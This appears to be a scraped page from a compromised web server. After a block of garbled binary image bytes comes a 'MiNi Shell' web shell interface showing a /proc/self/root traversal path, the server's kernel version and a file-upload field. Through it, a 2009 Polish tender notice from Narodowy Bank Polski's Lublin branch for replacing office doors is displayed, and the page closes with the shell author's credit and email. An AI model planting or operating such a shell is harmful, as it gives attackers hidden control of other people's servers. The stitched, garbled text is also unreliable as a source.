JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090323/73050-N-2009.html

<p class="kh_header"><b>Lublin: Wymiana drzwi do pomieszczeń w budynku Oddziału Okręgowego NBP w Lublinie przy ul. Chopina 6 na nowe drzwi drewniane.</b><br>
<b>Numer ogłoszenia: 73050 - 2009; data zamieszczenia: 23.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Narodowy Bank Polski Oddział Okręgowy w Lublinie , ul. Chopina 6, 20-928 Lublin, woj. lubelskie, tel. 081 5317612, 5317621.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nbp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wymiana drzwi do pomieszczeń w budynku Oddziału Okręgowego NBP w Lublinie przy ul. Chopina 6 na nowe drzwi drewniane..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wymiana drzwi do pomieszczeń  budynku Oddziału Okręgowego NBP w Lublinie przy ul. Chopina 6 na nowe drzwi drewniane o nietypowych wymiarach.
2.	Zakres prac obejmuje:
1)	dokonanie obmiarów otworów pod wymianę drzwi,
2)	opracowanie projektu budowlanego na wymianę drzwi,
3)	współpraca z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie 
4)	uzyskanie pozwolenia Lubelskiego Wojewódzkiego Konserwatora Zabytków na realizację robót (w formie decyzji administracyjnej),
5)	uzyskanie ostatecznej decyzji o pozwoleniu na budowę (wymagane dla obiektów zabytkowych),
6)	demontaż  44 szt.  drzwi przeznaczonych do wymiany wraz z robotami towarzyszącymi obejmującymi między innymi wyniesienie z budynku oraz  ich  wywiezienie i utylizację,
7)	dostawa i montaż  20  szt. nowych 1-skrzydłowych drzwi pełnych drewnianych, 
8)	dostawa i montaż  19 szt. nowych 1-skrzydłowych drzwi przeszklonych drewnianych,  
9)	dostawa i montaż  4 kompletów nowych 2-skrzydłowych  drzwi przeszklonych drewnianych, 
10)	dostawa i montaż ościeżnic o szerokości regulowanej opasującej ścianę - wykonanych z klejonki sosnowej z okleiną naturalną dębową dąb/dąb 
11)	dostawa i montaż  listew maskujących litych dębowych - z obu stron ościeżnicy, 
12)	wymiana listew przypodłogowych w korytarzu  pierwszego piętra,
13)	zdemontowanie   mosiężnych ramek (do zamieszczania  informacji - po 2 szt. na  drzwiach) 
a następnie zamocowanie   na nowe skrzydła,
14)	wykonanie prac towarzyszących wyszczególnionych w kosztorysie ofertowym opracowanym na bazie kosztorysu nakładczego stanowiącego zał. nr 1 do SIWZ (obejmujących m. in. uzupełnienie ubytków w parkiecie powstałych w wyniku demontażu progów, ościeżnic  i opasek, wymiana listew metalowych  mocujących wykładzinę dywanową w miejscach montażu drzwi, uzupełnienie ubytków listew przypodłogowych w pokojach powstałych w wyniku wymiany drzwi, wszelkie prace i usługi  transportowe zarówno drzwi demontowanych jak i montowanych).
Urządzenia kontroli dostępu zamontowane na istniejącej stolarce drzwiowej Zamawiający zdemontuje  - na czas montażu nowej stolarki w uzgodnionym obustronnie  terminie - a  następnie zainstaluje we własnym zakresie na nowej stolarce drzwiowej.  
3.	Prace demontażowe oraz montażowe  stolarki drzwiowej  będą wykonywane w terminach ściśle uzgadnianych z Zamawiającym: część w godzinach pracy Oddziału, część po godzinach pracy Oddziału (po godz. 16 w dni robocze) oraz w dni wolne od pracy ( sobota - niedziela)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4, 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W przetargu nie jest wymagane wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy spełniający poniższe warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie innych podmiotów do  udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj. wykażą że:
-  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonali co najmniej jedno  zamówienia odpowiadające swoim rodzajem i wartością dostawom i  robotom objętym przedmiotem zamówienia o wartości nie  mniejszej niż  197 tys. zł. netto.
-   dysponują osobami z nadzoru technicznego, które posiadają prawo wykonywania samodzielnych funkcji technicznych w budownictwie zgodnie z wymaganiami ustawowymi w zakresie kierowania robotami budowlanymi branży ogólnobudowlanej, 
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia; 
4)	nie podlegają wykluczeniu  z postępowania o zamówienie publiczne.

2.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie  dostarczonych  przez Wykonawcę dokumentów i oświadczeń. Dokumenty te i oświadczenia powinny jednoznacznie potwierdzać spełnianie postawionych warunków.
Sposób dokonywania oceny polegał będzie na sprawdzeniu każdego z warunków
i ustaleniu czy:
-	jest spełniony,
-	nie jest spełny.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawca winien przedłożyć w oryginale oświadczenie o spełnieniu warunków udziału w postępowaniu o udzielenie zamówienia zgodnie z art. 22 ust 1 ustawy, oraz  o niepodleganiu wykluczeniu z  postępowania o udzielenie zamówienia  zgodnie z art. 24 ustawy
2.	W celu potwierdzenia,  posiadania uprawnienia do wykonywania określonej działalności lub czynności oraz niepodlegania wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych zwanej dalej ustawą, Wykonawca załącza do oferty, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujące dokumenty:

2.1	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,

2.2	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,

3.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, zobowiązany jest dostarczyć  następujące dokumenty:

3.1.wykaz wykonanych w okresie ostatnich  pięciu   lat  dostaw i robót, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością  dostawom i robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających,że  dostawy  i roboty zostały wykonane należycie.

3.2.	wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia  z podaniem zakresu wykonywanych przez nich czynności, tj:
a)	dokument potwierdzający przynależność osób wyznaczonych do kierowania robotami budowlanymi do właściwej izby samorządu zawodowego architektów lub inżynierów budownictwa,
b)	dokument potwierdzający posiadanie uprawnień budowlanych dla osób wyznaczonych do kierowania robotami budowlanymi  w specjalności konstrukcyjno-budowlanej,
c)	pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w  pkt 3.2,  wykonawca wskazał osoby, którymi będzie dysponował,  
 
4.	 W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, zobowiązany jest  dostarczyć polisę, a w przypadku jej braku  inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 197 tys. zł.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2.1 , 2.2  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
     5.1  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
      	5.2  nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie  na  raty   zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu.

6.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust.5  zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

7.	Dokumenty, o których mowa w ust. 5 i 6 składane są w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczonych na język polski poświadczonych przez polskie placówki konsularne stosownie do obowiązujących przepisów.

8.	W przypadku składania oferty przez dwa lub więcej podmiotów występujących wspólnie  wymóg złożenia dokumentów, o których mowa  w ust. 1, 2, 5, 6 dotyczy każdego z podmiotów.

9.	Wymagane dokumenty Wykonawcy przekazują w formie pisemnej jako załączniki do oferty w kopercie razem z ofertą..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.nbp.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Narodowy Bank Poklski Oddział Okręgowy  w Lublinie ul. Chopina 6  20-928 Lublin.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:00, miejsce: Narodowy Bank Polski Oddział Okręgowy w Lublinie ul. Chopina 6..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com